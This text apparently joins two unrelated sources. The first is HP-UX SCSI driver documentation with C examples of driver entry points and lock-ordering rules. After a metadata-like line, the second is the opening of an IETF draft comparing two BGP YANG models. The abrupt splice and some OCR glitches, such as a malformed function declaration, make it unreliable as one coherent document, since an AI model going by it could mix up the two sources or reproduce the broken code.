dd_close() is called from scsi_lun_close() in a process context. The open/close lun semaphore is held when the dd_close() function is called. dd_close() is not called from within a critical section; it may block.
**Declaration**
```c
void dd_close(
dev_t dev
);
```
**Parameters**
*dev* The device number.
**Return Values**
dd_close() does not return a value.
**Example**
```c
#include <sys/scsi_ctl.h>
#define ST_GEOM_LOCKED 0x00000002
void mydriver_dd_close(dev)
dev_t dev;
{
struct scsi_lun *lp = m_scsi_lun(dev);
struct mydriver_lun *llp = lp->dd_lun;
if (dd_blk_open_cnt(lp) == 1) {
scsi_lun_lock(lp);
llp->state &= ~ST_GEOM_LOCKED;
scsi_lun_unlock(lp);
}
}
```
**dd_ioctl Routine**
The dd_ioctl() routine is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the dd_ioctl field of the scsi_ddsw structure.
If this routine exists in the `scsi_ddsw` structure, it is called by `scsi_ioctl()` if the ioctl command remains unsatisfied by the choices provided within that SCSI Services procedure. If `dd_ioctl()` does not exist when called, `scsi_ioctl()` returns an error.
Examine the ioctl commands provided by SCSI Services in `scsi_ioctl()`, and implement any additional commands needed in your `dd_ioctl()` routine.
It is in `dd_ioctl()` and in `dd_open()`, if implemented, that some of the more specialized features of SCSI Services may be useful, as listed below.
- `scsi_cmd()`
- `scsi_init_inquiry_data()`
- `scsi_mode_sense()`
- `scsi_mode_fix()`
- `scsi_mode_select()`
- `scsi_wr_protect()`
**Conditions**
`dd_ioctl()` is called from `scsi_ioctl()` in a process context. It is not called from within a critical section; it may block.
**Declaration**
```c
int dd_ioctl (
dev_t dev,
int cmd,
caddr_t data,
int flags
);
```
**Parameters**
- `cmd` The command word
- `data` Pointer to the commands arguments
- `dev` The device number
- `flags` The file-access flags
Return Values
dd_ioctl() is expected to return the following values:
- **0**: Successful completion.
- **<0**: Error. Value is expected to be an errno.
Example
```c
#include <sys/scsi.h>
#include <sys/scsi_ctl.h>
mydriver_dd_ioctl(dev_t dev,
    int cmd,
    int *data,
    int flags)
{
struct scsi_lun *lp = m_scsi_lun(dev);
struct mydriver_lun *llp = lp->dd_lun;
struct scsi_tgt *tp = lp->tgt;
struct scsi_bus *busp = tp->bus;
struct inquiry_2 *inq = &lp->inquiry_data.inq2;
disk_describe_type *ddt;
int size = (cmd & IOCSIZE_MASK) >> 16;
int i;
switch (cmd & IOCCMD_MASK)
{
case DIOC_DESCRIBE & IOCCMD_MASK:
if (cmd != DIOC_DESCRIBE && size != 32)
return EINVAL;
ddt = (void *) data;
i = inq->dev_type;
bcopy(inq->product_id, ddt->model_num, 16);
ddt->intf_type = SCSI_INTF;
ddt->maxsva = llp->nblks - 1;
ddt->lgblksz = llp->blk_sz;
ddt->dev_type = i == SCSI_DIRECT_ACCESS ? DISK_DEV_TYPE
: i == SCSI_WORM ? WORM_DEV_TYPE
: i == SCSI_CDROM ? CDROM_DEV_TYPE
: i == SCSI_MO ? MO_DEV_TYPE
: UNKNOWN_DEV_TYPE;
if (HP_MO(lp))
/* Shark lies; fix it to match Series800 */
        ddt->dev_type = MO_DEV_TYPE;
    if (size == 32)
        return 0;
    /* WRITE_PROTECT for SCSI WORM */
    ddt->flags = (llp->state & LL_WP) ? WRITE_PROTECT_FLAG : 0;
    return 0;
}
switch (cmd) {
case SIOC_CAPACITY:
    ((struct capacity *) data)->lba = llp->nblks;
    ((struct capacity *) data)->blksz = llp->blk_sz;
    return 0;
case SIOC_GET_IR:
    return mydriver_wce(dev, SIOC_GET_IR, data);
case SIOC_SET_IR:
    if (!(flags & FWRITE) && !suser())
        return EACCES;
    if (*data & ~0x1)
        return EINVAL;
    return mydriver_wce(dev, SIOC_SET_IR, data);
case SIOC_SYNC_CACHE:
    if (llp->state & LL_IR)
        return mydriver_sync_cache(dev);
    else
        return 0; /* IR not on, just return */
case DIOC_CAPACITY:
    *data = (llp->devb_lshift > 0
        ? llp->nblks >> llp->devb_lshift
        : llp->nblks << -llp->devb_lshift);
    return 0;
...
default:
    return EINVAL;
}
}
```
**dd_ioctl_okay Routine**
The `dd_ioctl_okay()` SCSI function is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the `dd_ioctl_okay` field of the `scsi_ddsw` structure.
When a nonpass-through driver has the device open concurrently, `dd_ioctl_okay()` disallows any ioctl command issued through the pass-through driver that the routine does not explicitly allow.
**Conditions**
`dd_ioctl_okay()` is called from `sctl_ioctl()` in a process context. It is called within a critical section; it may not block.
**NOTE**
It is desirable to allow `SIOC_INQUIRY` for the pass-through driver at all times. Therefore, `SIOC_INQUIRY` is allowed by default (if there is no `dd_ioctl_okay()` routine). `SIOC_INQUIRY` is also always allowed if it will not result in I/O (`lp->inquiry_sz > 0`), because it does not affect the nonpass-through device driver in any way.
**Declaration**
```c
int dd_ioctl_okay (
dev_t dev,
int cmd,
caddr_t data,
int flags
);
```
**Parameters**
- `cmd` The command word
- `data` Pointer to the commands arguments
- `dev` The device number
- `flags` The file-access flags
**Return Values**
`dd_ioctl_okay()` is expected to return the following values:
- `PT_OKAY` Successful completion.
- `0` Error.
Examples
```c
#include <sys/scsi_ctl.h>
mydriver_dd_ioctl_okay(
    dev_t dev,
    int cmd,
    void *data,
    int flags)
{
return PT_OKAY;
}
```
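The example above allows everything. A driver that wants finer control can filter by command instead. The sketch below is hypothetical: the command codes and the `MY_PT_OKAY` value are invented for illustration, and a real routine would take the full `(dev, cmd, data, flags)` arguments:

```c
#include <assert.h>

/* Illustrative values; real command codes come from <sys/scsi.h>
 * and PT_OKAY from <sys/scsi_ctl.h>. */
#define MY_PT_OKAY        1
#define MY_SIOC_INQUIRY   0x01
#define MY_SIOC_CAPACITY  0x02
#define MY_SIOC_FORMAT    0x03

/* Permit harmless query commands through the pass-through driver;
 * refuse anything that could disturb the device state managed by
 * the nonpass-through driver. */
static int my_ioctl_okay(int cmd)
{
    switch (cmd) {
    case MY_SIOC_INQUIRY:
    case MY_SIOC_CAPACITY:
        return MY_PT_OKAY;
    default:
        return 0;                      /* disallowed */
    }
}
```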
dd_open Routine
The `dd_open()` SCSI function is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the `dd_open` field of the `scsi_ddsw` structure.
If this routine exists in the `scsi_ddsw` structure, it is called to perform the actual device “open” processing.
As an example, the disk driver's `sd_open()` calls `disksort_init_queue()` for the LUN's lun_disk_queue. It calls `scsi_init_inquiry_data()` to set the target state for SDTR and WDTR, and sends the Start Unit, Test Unit Ready, Prevent Media Removal, and Read Capacity commands, as appropriate for the type of disk being opened.
This routine can be as complicated as you need to ensure the device is properly open the first time (ensured by checking `dd_open_cnt`). Calling the SCSI Service `scsi_init_inquiry_data()` is reasonable, as is performing Test Unit Ready. Changing state in the `scsi_lun` or target structures requires protection.
Conditions
`dd_open()` is called from `scsi_lun_open()` in a process context. The open/close lun_semaphore is held when `dd_open()` is called. `dd_open()` is not called within a critical section; it may block.
Declaration
```c
int dd_open (
    dev_t dev,
    int oflags
);
```
Parameters
dev The device number
oflags The flags passed in the open call
Return Values
dd_open() is expected to return the following values:
0 Successful completion.
<>0 Error. The value is expected to be an errno value.
Examples
```c
#include <sys/scsi_ctl.h>
mydriver_dd_open(dev, oflags)
dev_t dev;
int oflags;
{
    struct scsi_lun *lp = m_scsi_lun(dev);
    struct mydriver_lun *llp = lp->dd_lun;
    struct scsi_tgt *tp = lp->tgt;
    struct inquiry_2 *inq = &lp->inquiry_data.inq2;
    struct capacity cap;
    u_char cdb[12];
    struct sense_hdr *hd;
    struct block_desc *bd;
    struct caching_page *c_pd;
    struct error_recovery *e_pd;
    int ret_size, bpb, error, x;

    /*
     * Only first opens are interesting.
     */
    if (dd_open_cnt(lp) > 1)
        return 0;
    ...
    /*
     * Inquiry.
     *
     * Call the routine provided by services to do any necessary
     * synchronization with the pass-through driver. Success here
     * does not imply that there is no more pending sense data.
     * In fact, the SCSI-2 standard encourages devices not to give
     * Check Condition status on Inquiry, but to defer it until a
     * subsequent command. Also, if the inquiry data had already
     * been cached as a result of a pass-through driver open or
     * SIOC_INQUIRY, this may not even result in I/O.
     */
    if (error = scsi_init_inquiry_data(dev))
        return error;
    /*
     * Needs protection at LUN and Tgt.
     */
    scsi_lun_lock(lp);
    scsi_tgt_lock(tp);
    tp->state |= T_ENABLE_SDTR;
    ...
    /*
     * Allow an incomplete open if this is a raw device.
     */
    if (major(dev) == mydriver_ddsw.raw_major)
    {
        scsi_lun_lock(lp);
        lp->state |= L_DISABLE_OPENS;
        scsi_lun_unlock(lp);
        return 0;
    }
    ...
    return error;
}
```
**dd_pass_thru_done Routine**
The `dd_pass_thru_done()` routine is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the `dd_pass_thru_done` field of the `scsi_ddsw` structure.
If this routine exists in the `scsi_ddsw` structure, SCSI Services executes it on completion of a pass-through I/O. It allows the device driver to make note of any I/Os which have occurred and any resulting status and/or sense data.
The `dd_pass_thru_done()` function is called from within a critical section; it is not permitted to block.
**Declaration**
```c
int dd_pass_thru_done (
struct buf *bp
);
```
**Parameters**
- `bp` buf structure
**Return Values**
`dd_pass_thru_done()` is declared as returning `int`; however, the return is not used by SCSI services.
**dd_pass_thru_okay Routine**
The `dd_pass_thru_okay()` routine is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the `dd_pass_thru_okay` field of the `scsi_ddsw` structure.
If a device is opened by a nonpass-through device driver and the driver specifies a `dd_pass_thru_okay()` entry point in its `scsi_ddsw` structure, then the driver has complete control over what pass-through I/Os are allowed. If the driver does not specify a `dd_pass_thru_okay()` entry point, then pass-through I/Os are not allowed.
The `dd_pass_thru_okay()` function is called from within a critical section and may not block.
**Declaration**
```c
int dd_pass_thru_okay (
dev_t dev,
struct sctl_io *sctl_io
);
```
**Parameters**
- `dev` The device number
- `sctl_io` Struct containing ioctl information
**Return Values**
`dd_pass_thru_okay()` is expected to return the following values:
- `PT_OKAY` Successful completion.
- `0` Error.
**Example**
```c
#include <sys/scsi_ctl.h>
mydriver_dd_pass_thru_okay(dev, sctl_io)
dev_t dev;
struct sctl_io *sctl_io;
{
return PT_OKAY;
}
```
**dd_read Routine**
The `dd_read()` routine is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the `dd_read` field of the `scsi_ddsw` structure.
If this routine exists in the `scsi_ddsw` structure, it is called instead of `physio()` by `scsi_read()`.
`dd_read()` is called in a process context. It is not called from within a critical section; it may block.
Declaration
```c
int dd_read (
dev_t dev,
struct uio *uio
);
```
Parameters
- **dev**
The device number
- **uio**
Structure containing transfer information
Return Values
- **dd_read()** is expected to return the following values:
- **0**
Successful completion.
- **<>0**
Error. The value is expected to be an `errno` value.
Example
```c
mydriver_dd_read(dev, uio)
dev_t dev;
struct uio *uio;
{
struct scsi_lun *lp = m_scsi_lun(dev);
struct sf_lun *llp = lp->dd_lun;
int error;
scsi_lun_lock(lp);
while (llp->state & ST_GEOM_SEMAPHORE)
scsi_sleep(lp, &llp->state, PRIBIO);
llp->state |= ST_GEOM_SEMAPHORE;
scsi_lun_unlock(lp);
sf_update_geometry(dev);
error = physio(scsi_strategy, NULL, dev, B_READ, minphys, uio);
scsi_lun_lock(lp);
llp->state &= ~ST_GEOM_SEMAPHORE;
scsi_lun_unlock(lp);
wakeup(&llp->state);
return error;
}
```
dd_start Routine
The dd_start() routine is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the dd_start field of the scsi_ddsw structure.
If this routine exists in the scsi_ddsw structure, it is called by scsi_start() to allow the driver to perform any necessary processing prior to calling scsi_start_nexus().
The dd_start() function is called in the process and interrupt context from within a critical section in scsi_start(). dd_start() is not permitted to block.
The critical section in scsi_start(), from where the dd_start() function is called, is mainly protecting the scsi_lun structure and guaranteeing that lp->n_scbs is consistent with the dd_start() function starting a request or not. The critical section also protects the incrementing of n_scbs in the scsi_tgt structure and the incrementing of the SCSI subsystem unique I/O ID scsi_io_cnt.
If this routine does not exist, only “special” I/Os (B_SIOC_IO or B_SCSI_CMD) can be performed.
The driver’s dd_start() routine must dequeue the I/O from the appropriate list and perform whatever is necessary for the device to operate upon the I/O.
The parameters passed for this purpose are the lp and the scb parameters. The scb has the necessary cdb[] array for the SCSI command bytes.
Declaration
struct buf *dd_start (
struct scsi_lun *lp,
struct scb *scb
);
Parameters
lp The open LUN structure
scb Extra state information for I/O
Return Values
`dd_start()` is expected to return the following values:
- `struct buf *bp` Successful completion.
- `NULL` Error.
Example
```c
#include <sys/scsi_ctl.h>
struct buf *mydriver_dd_start(lp, scb)
struct scsi_lun *lp;
struct scb *scb;
{
struct mydriver_lun *llp = lp->dd_lun;
struct buf *bp;
struct scb *head_scb, *scb_forw, *scb_back;
int nblks, blkno, x;
int lshift = llp->devb_lshift;
/*
* We could be more granular with locks, but
* that would most likely cause too much
* overhead getting/releasing locks.
*/
scsi_lun_lock(lp);
if ((bp = mydriver_dequeue(lp)) == NULL)
goto start_done;
nblks = bp->b_bcount >> llp->log2_blk_sz;
if (bp->b_offset & DEV_BMASK)
blkno = (unsigned) bp->b_offset >> llp->log2_blk_sz;
else
blkno = (unsigned) (lshift > 0
? bp->b_blkno << lshift
: bp->b_blkno >> -lshift);
    scb->cdb[0] = (bp->b_flags & B_READ)
        ? CMDread10
        : llp->state & LL_WWV
            ? CMDwriteNverify
            : CMDwrite10;
    scb->cdb[1] = 0;
    scb->cdb[2] = blkno >> 24;
    scb->cdb[3] = blkno >> 16;
    scb->cdb[4] = blkno >> 8;
    scb->cdb[5] = blkno;
    scb->cdb[6] = 0;
    scb->cdb[7] = nblks >> 8;
    scb->cdb[8] = nblks;
    scb->cdb[9] = 0;
    /* Immediate Reporting (WCE) ON */
    if (llp->state & LL_IR)
        if ((scb->cdb[0] == CMDwrite10) && (bp->b_flags & B_SYN))
            ...
    /* Assume that scb->io_id will be set by caller within */
    /* this CRIT */
    /* Queue this bp into llp->active_bp_list HEAD for */
    /* tracking */
    if (llp->active_bp_list != NULL)
    {
        head_scb = (void *) llp->active_bp_list->b_scb;
        scb->io_forw = llp->active_bp_list;
        scb->io_back = head_scb->io_back;
        scb_forw = (void *) scb->io_forw->b_scb;
        scb_back = (void *) scb->io_back->b_scb;
        scb_forw->io_back = bp;
        scb_back->io_forw = bp;
        llp->active_bp_list = bp;
    }
    else
    {
        llp->active_bp_list = bp;
        scb->io_forw = scb->io_back = bp;
    }
    /* Although redundant with caller, set this in case
     * completion int */
    bp->b_scb = (long) scb;
start_done:
    scsi_lun_unlock(lp);
    return bp;
}
```
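The CDB bytes assembled in the example follow the standard 10-byte READ/WRITE layout: a big-endian 32-bit block number in bytes 2..5 and a big-endian 16-bit block count in bytes 7..8. The stand-alone helper below (a hypothetical extraction, not a SCSI Services routine) shows just that byte packing:

```c
#include <assert.h>

/* Pack the LBA and transfer length of a 10-byte SCSI CDB the same
 * way the dd_start() example does: big-endian 32-bit block number
 * in bytes 2..5, big-endian 16-bit block count in bytes 7..8. */
static void fill_cdb10(unsigned char cdb[10], unsigned long blkno,
                       unsigned int nblks)
{
    cdb[1] = 0;
    cdb[2] = (unsigned char)(blkno >> 24);
    cdb[3] = (unsigned char)(blkno >> 16);
    cdb[4] = (unsigned char)(blkno >> 8);
    cdb[5] = (unsigned char)blkno;
    cdb[6] = 0;
    cdb[7] = (unsigned char)(nblks >> 8);
    cdb[8] = (unsigned char)nblks;
    cdb[9] = 0;
}
```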
**dd_strategy Routine**
The `dd_strategy()` routine is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the `dd_strategy` field of the `scsi_ddsw` structure.
The `dd_strategy()` routine is called by `scsi_strategy()` to perform whatever sorting or queuing the device driver requires for normal I/O. For most drivers, enqueuing to `lp->scb_q` is necessary; the `scsi_disk` driver calls `disksort_enqueue()`.
`dd_strategy()` is called in a process (and possibly, interrupt) context; it is not allowed to block.
If the driver invokes `scsi_strategy()`, `dd_strategy()` is required. If the `dd_read()` or `dd_write()` routines are not specified, SCSI Services will assume `physio()` is to be used.
---
**NOTE**
The `scsi_strategy()` calls `dd_strategy()` holding `lun_lock`.
---
Declaration
```
int (*dd_strategy) dd_strategy (
struct buf *bp,
struct scsi_lun *lp
);
```
Parameters
- **bp**: transfer buf header
- **lp**: scsi LUN information
Return Values
`dd_strategy()` is expected to return the following values:
- **0**: Successful completion.
- **-1**: Error.
Example
The MP protection is provided for modification of the queues. Here is an example for a tape:
```c
mydriver_dd_strategy(bp)
struct buf *bp;
{
struct scsi_lun *lp = m_scsi_lun(bp->b_dev);
struct st_lun *llp = lp->dd_lun;
struct st_static_lun *sllp = llp->static_data;
DB_ASSERT(!(bp->b_flags & B_ERROR));
sllp->head_pos &= ~HEAD_FORWARD;
P_LOG(bp->b_dev, READ_WRITE, bp->b_bcount, "req_size", "Request size");
/* Check for valid request size in fixed block mode */
if (llp->block_size > 0 && bp->b_bcount % llp->block_size != 0)
{
NP_LOG(bp->b_dev, READ_WRITE, llp->block_size, "blk_size", "Not a multiple of block size");
bp->b_flags |= B_ERROR;
bp->b_error = ENXIO;
biodone(bp);
}
...
}
```
A SCSI disk does not use `lp->scb_q`. Instead, it uses `disksort()`, a service from the file system. The following is an example of its use:
```c
mydriver_dd_strategy(bp)
struct buf *bp;
{
dev_t dev = bp->b_dev;
struct scsi_lun *lp = m_scsi_lun(dev);
struct mydriver_lun *llp = lp->dd_lun;
ASSERT(!(bp->b_flags & B_ERROR));
if (bpcheck(bp, llp->nblks, llp->log2_blk_sz, 0))
return -1;
LOG(bp->b_dev, FUNC_QUEUE, bp->b_blkno, "b_blkno");
LOG(bp->b_dev, FUNC_QUEUE, bp->b_offset, "b_offset");
LOG(bp->b_dev, FUNC_QUEUE, bp->b_bcount, "b_bcount");
return mydriver_enqueue(lp, bp);
}
```
```c
mydriver_enqueue(lp, bp)
struct scsi_lun *lp;
struct buf *bp;
{
int x;
struct mydriver_lun *llp = lp->dd_lun;
struct buf *dp;
dp = &llp->lun_disk_queue;
/* set B_FIRST to get queue preference */
if (bp->b_flags & B_SPECIAL)
bp->b2_flags |= B2_FIRST;
/* fake b_cylin 512K per cylinder */
bp->b_cylin = (bp->b_offset >> 19);
disksort_enqueue(dp, bp);
/* Increment counters within this protection */
scsi_enqueue_count(lp, bp);
return 0;
}
```
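The fake `b_cylin` computed above treats every 512 KB of byte offset as one cylinder, so the conversion is a plain right shift by 19 (2^19 = 524288). A tiny stand-alone check, with an invented helper name:

```c
#include <assert.h>

/* One fake "cylinder" per 512 KB of byte offset, as in the
 * enqueue example: cylinder = offset >> 19. */
static long offset_to_cylin(long b_offset)
{
    return b_offset >> 19;
}
```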
Warning
dd_strategy() must exist (be defined as non-NULL in the scsi_ddsw structure) if your driver calls scsi_strategy().
dd_write Routine
The dd_write() routine is provided by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the dd_write field of the scsi_ddsw structure.
If this routine exists in the scsi_ddsw structure, it is called instead of physio() by scsi_write().
This routine is called from scsi_write() in a process context. Since it is not called from within a critical section, it may block.
Declaration
int dd_write (dev_t dev,
struct uio *uio);
Parameters
dev The device number
uio Structure containing transfer information
Return Values
dd_write() is expected to return the following values:
0 Successful completion.
errno Error.
Example
```c
#include <sys/scsi_ctl.h>
#define ST_GEOM_SEMAPHORE 2
mydriver_dd_write(dev, uio)
dev_t dev;
struct uio *uio;
{
struct scsi_lun *lp = m_scsi_lun(dev);
struct sf_lun *llp = lp->dd_lun;
int error;
scsi_lun_lock(lp);
while (llp->state & ST_GEOM_SEMAPHORE)
scsi_sleep(lp, &llp->state, PRIBIO);
llp->state |= ST_GEOM_SEMAPHORE;
scsi_lun_unlock(lp);
sf_update_geometry(dev);
error = physio(scsi_strategy, NULL, dev, B_WRITE, minphys, uio);
scsi_lun_lock(lp);
llp->state &= ~ST_GEOM_SEMAPHORE;
scsi_lun_unlock(lp);
wakeup(&llp->state);
return error;
}
```
Data Protection for SCSI Drivers
The SCSI Services your driver calls take the appropriate locks to provide MP protection. One thing your driver must provide is protection for accessing its own private data and any data under the domain of the SCSI Services, such as `scsi_lun`, `scsi_tgt`, `scsi_bus`, or the SCSI subsystem’s data. Locks are defined in `<sys/scsi_ctl.h>`.
Rules for Ordering Locks
The rules for ordering locks and semaphores help the kernel detect deadlocks in their use. When a thread of execution must hold more than one lock or semaphore, it must acquire them in increasing order. The order of locks and semaphores is, in ascending order:
1. LUN lock
2. Target lock
3. Bus lock
4. Subsystem lock
If a thread of execution must hold both the LUN lock and target lock at the same time, the ordering rules assert that the code must acquire the LUN lock before it acquires the target lock.
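The ordering rule can be kept honest with a simple debug check in the driver: record the highest lock level held and refuse to take a lower or equal one. This sketch is illustrative only; the level values are invented, not kernel constants:

```c
#include <assert.h>

/* Lock levels in ascending acquisition order, per the rules above. */
enum my_lock_level {
    MY_LUN_LOCK = 1,
    MY_TGT_LOCK = 2,
    MY_BUS_LOCK = 3,
    MY_SUBSYS_LOCK = 4
};

/* A thread may acquire a lock only if its level is strictly higher
 * than the highest level it already holds (0 = holds none). */
static int may_acquire(int highest_held, enum my_lock_level next)
{
    return (int)next > highest_held;
}
```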
The spinlocks that are used to implement the LUN, target, bus, and subsystem locks are the normal HP-UX spinlocks.
While a thread of execution holds a lock, the processor’s interrupt level is set to SPL6, preventing I/O devices from interrupting that processor. The spinlock associated with `spl*()` services (`spi_lock`) is of lower order than practically all other locks, so code protected by a spinlock cannot call a `spl*()` routine.
Subsystem Lock
The subsystem lock protects the SCSI subsystem’s global data. Only SCSI Services access this data, so your driver should have no need for this lock.
**Bus Lock**
Each `scsi_bus` structure has a lock associated with it that protects many of the fields in the structure. Most drivers do not need to use the bus lock, because they ordinarily do not access the information maintained in the `scsi_bus` structure.
You should be aware that some HP device drivers access the `B_EXCLUSIVE` flag in the state field of the `scsi_bus` structure.
**Target Lock**
Each `scsi_tgt` structure has a lock associated with it that protects some of the fields in the structure. Device drivers can access the `open_cnt`, `sctl_open_cnt`, `state`, and `bus` fields in this structure. Device drivers may only modify the `state` field, and must do so under the protection of the target lock. The target lock can also be used to prevent the `open_cnt`, `sctl_open_cnt`, or `state` field from being modified while other conditions are checked or actions are performed.
**LUN Lock**
Each `scsi_lun` structure has a lock associated with it that protects the fields in the structure and in the `dd_lun` private data area. See the following section on the LUN structure to see which fields device drivers can access and modify, and which locks protect those fields.
For the `driver_open()` routine, the device driver does not have any of the locks available until after the kernel calls `scsi_lun_open()`, because `scsi_lun_open()` creates the `scsi_bus`, `scsi_tgt`, and `scsi_lun` structures.
For the `driver_close()` routine, the situation is similar. The locks are also available when the `dd_close()` routine is called. When `scsi_lun_close()` returns control to its caller, the locks are no longer available to your driver.
SCSI Services Summary
SCSI Services are commonly used SCSI functions that allow device and interface drivers to be much smaller and more supportable. In addition to providing most commonly used SCSI functions, WSIO SCSI Services also provide a supported pass-through mechanism. (See scsi_ctl(7) in the HP-UX Reference for information on pass-through.)
SCSI Services are summarized in Table 9-1, “SCSI Services.” For more detailed information on these services see the HP-UX Driver Development Reference.
### Table 9-1: SCSI Services
<table>
<thead>
<tr>
<th>Service</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>m_scsi_lun()</td>
<td>Returns scsi_lun pointer corresponding to the dev_t parameter passed in.</td>
</tr>
<tr>
<td>disksort_enqueue()</td>
<td>Places I/O requests on queues maintained by SCSI Services.</td>
</tr>
<tr>
<td>scsi_dequeue()</td>
<td>Removes I/O requests from queues maintained by SCSI Services.</td>
</tr>
<tr>
<td>scsi_dequeue_bp()</td>
<td>Externally available to dequeue particular bp from circular list. Intended for use with LVM's B_PFTIMEOUT.</td>
</tr>
<tr>
<td>scsi_ddsw_init()</td>
<td>Called from device driver's driver_dev_init() routine. Causes initialization of blk_major and raw_major fields in the driver's switch table (ddsw).</td>
</tr>
<tr>
<td>scsi_lun_open()</td>
<td>Called from device driver's driver_dev_init() routine. Performs necessary open operations, including the invocation of the calling driver's ddsw->dd_open() routine.</td>
</tr>
</tbody>
</table>
### Table 9-1: SCSI Services (continued)
<table>
<thead>
<tr>
<th>Service</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>scsi_init_inquiry_data()</td>
<td>Called from device driver's <code>ddsw->dd_open()</code> routine. Performs first SCSI Inquiry request to the device.</td>
</tr>
<tr>
<td>scsi_strategy()</td>
<td>The first place in the I/O path that all I/O requests have in common. Its primary purpose is to enqueue the bp to await the necessary resources to allow the request to be sent to the interface driver, and thus, the hardware.</td>
</tr>
<tr>
<td>scsi_read()</td>
<td>Synchronous read routine, which calls <code>physio()</code>.</td>
</tr>
<tr>
<td>scsi_write()</td>
<td>Synchronous write routine, which calls <code>physio()</code>.</td>
</tr>
<tr>
<td>scsi_ioctl()</td>
<td>Ioctl commands that are supported by all drivers are implemented here to ensure consistency among drivers.</td>
</tr>
<tr>
<td>scsi_cmd(), scsi_cmdx()</td>
<td>For driver-generated I/O requests. It creates and builds a <code>sctl_io</code> and a <code>bp</code>, attaches the <code>sctl_io</code> to the <code>bp</code>, forwards the <code>bp</code> to the <code>scsi_strategy()</code> routine, and cleans up when the I/O is completed.</td>
</tr>
<tr>
<td>scsi_action()</td>
<td>Must ultimately be called after each I/O attempt completion (as in a retry situation). It may log errors to the <code>dmesg</code> buffer, retry the I/O, or disable tags.</td>
</tr>
</tbody>
</table>
### Table 9-1: SCSI Services (continued)
<table>
<thead>
<tr>
<th>Service</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>scsi_sense_action()</td>
<td>Interprets sense data for SCSI, CCS, or SCSI-2 compliance. It requires that the inquiry data for the device has been initialized by scsi_init_inquiry_data() before it can interpret it.</td>
</tr>
<tr>
<td>scsi_snooze()</td>
<td>Performs a sleep without tying up the processor. Must not be called by a thread of execution that holds any lock. Currently, this routine is used only by scsi_disk to delay subsequent device access following Inquiry to a particular model of Quantum disk drive.</td>
</tr>
<tr>
<td>scsi_log_io()</td>
<td>Records the I/O attempt and its results in the dmesg buffer.</td>
</tr>
</tbody>
</table>
|
olmocr_science_pdfs
|
2024-11-28
|
2024-11-28
|
a5d5a80ef6e935e2890c614fec963ea050cd1e0a
|
Comparison of I2RS and Config BGP Yang Modules
draft-hares-i2rs-bgp-compare-yang-01
Abstract
This document contains a comparison of two BGP YANG models: draft-zhdankin-netmod-bgp-cfg-01 and draft-wang-i2rs-bgp-dm. The YANG model in draft-zhdankin-netmod-bgp-cfg-01 is focused on configuration. The YANG model in draft-wang-i2rs-bgp-dm-00 is focused on the status and ephemeral state changes needed for the I2RS interface. The conclusion of the comparison is that there is little overlap except for the definitions of common BGP structures. draft-wang-i2rs-bgp-dm-00 is necessary to fulfill the majority of the requirements drawn from the BGP use cases in the I2RS use cases (draft-i2rs-hares-usecase-reqs-summary).
Status of This Memo
This Internet-Draft is submitted in full conformance with the provisions of BCP 78 and BCP 79.
Internet-Drafts are working documents of the Internet Engineering Task Force (IETF). Note that other groups may also distribute working documents as Internet-Drafts. The list of current Internet-Drafts is at http://datatracker.ietf.org/drafts/current/.
Internet-Drafts are draft documents valid for a maximum of six months and may be updated, replaced, or obsoleted by other documents at any time. It is inappropriate to use Internet-Drafts as reference material or to cite them other than as "work in progress."
This Internet-Draft will expire on April 30, 2015.
Copyright Notice
Copyright (c) 2014 IETF Trust and the persons identified as the document authors. All rights reserved.
This document is subject to BCP 78 and the IETF Trust’s Legal Provisions Relating to IETF Documents (http://trustee.ietf.org/license-info) in effect on the date of publication of this document. Please review these documents carefully, as they describe your rights and restrictions with respect to this document. Code Components extracted from this document must include Simplified BSD License text as described in Section 4.e of the Trust Legal Provisions and are provided without warranty as described in the Simplified BSD License.
Table of Contents
1. Introduction
2. Definitions and Acronyms
3. BGP Yang Draft Comparison
4. Differences between the drafts
   4.1. Overlap of configuration draft-zhdankin-netmod-bgp-01
   4.2. Unique configuration for draft-zhdankin-netmod-bgp-01
   4.3. Unique configuration for draft-wang-bgp-dm-00
5. Comparison of State needed versus BGP requirements
   5.1. BGP-REQ 01
   5.2. BGP-REQ 02
   5.3. BGP-REQ 03
   5.4. BGP-REQ 04
   5.5. BGP-REQ 05
   5.6. BGP-REQ 06
   5.7. BGP-REQ 07
   5.8. BGP-REQ 08
   5.9. BGP-REQ 09
   5.10. BGP-REQ 10
   5.11. BGP-REQ 11
   5.12. BGP-REQ 12
   5.13. BGP-REQ 13
   5.14. BGP-REQ 14
   5.15. BGP-REQ 15
   5.16. BGP-REQ 16
   5.17. BGP-REQ 17
   5.18. BGP-REQ 18
6. IANA Considerations
7. Security Considerations
8. Informative References
Author’s Address
1. Introduction
The Interface to the Routing System (I2RS) provides read and write access to the information and state within the routing process within routing elements. The I2RS client interacts with one or more I2RS agents to collect information from network routing systems. The processing of collecting information at the I2RS agent may require the I2RS Agent to filter certain information, group pieces of
information, or perform actions on the I2RS-collected information based on specific I2RS policies.
This draft is a comparison of the following two BGP yang models: [I-D.zhdankin-netmod-bgp-cfg], and [I-D.wang-i2rs-bgp-dm]. The comparison provides an overview of the differences, overlaps, and unique features of each yang model. The analysis also evaluates whether both models or a single model is necessary to satisfy the requirements for the BGP use cases found in the [I-D.hares-i2rs-usecase-reqs-summary].
This draft concludes that each of the two drafts focuses on the purpose it was created for (configuration, and I2RS status plus ephemeral state). The drafts have little overlap outside common definitions for some of the BGP functions. Both drafts reference BGP policy outside the basic structures (prefix-lists and policy-groups). Both drafts have concepts of AFI-level and BGP-neighbor-level features. The status and ephemeral state found in [I-D.wang-i2rs-bgp-dm] is necessary to fulfill the BGP use cases found in [I-D.hares-i2rs-usecase-reqs-summary]. Configuration knobs in [I-D.zhdankin-netmod-bgp-cfg] were helpful to support these BGP use cases, but the lack of state would not allow support of these features. The recommendation is that the two drafts harmonize the group structures and continue as two separate drafts for their original purposes (config and I2RS).
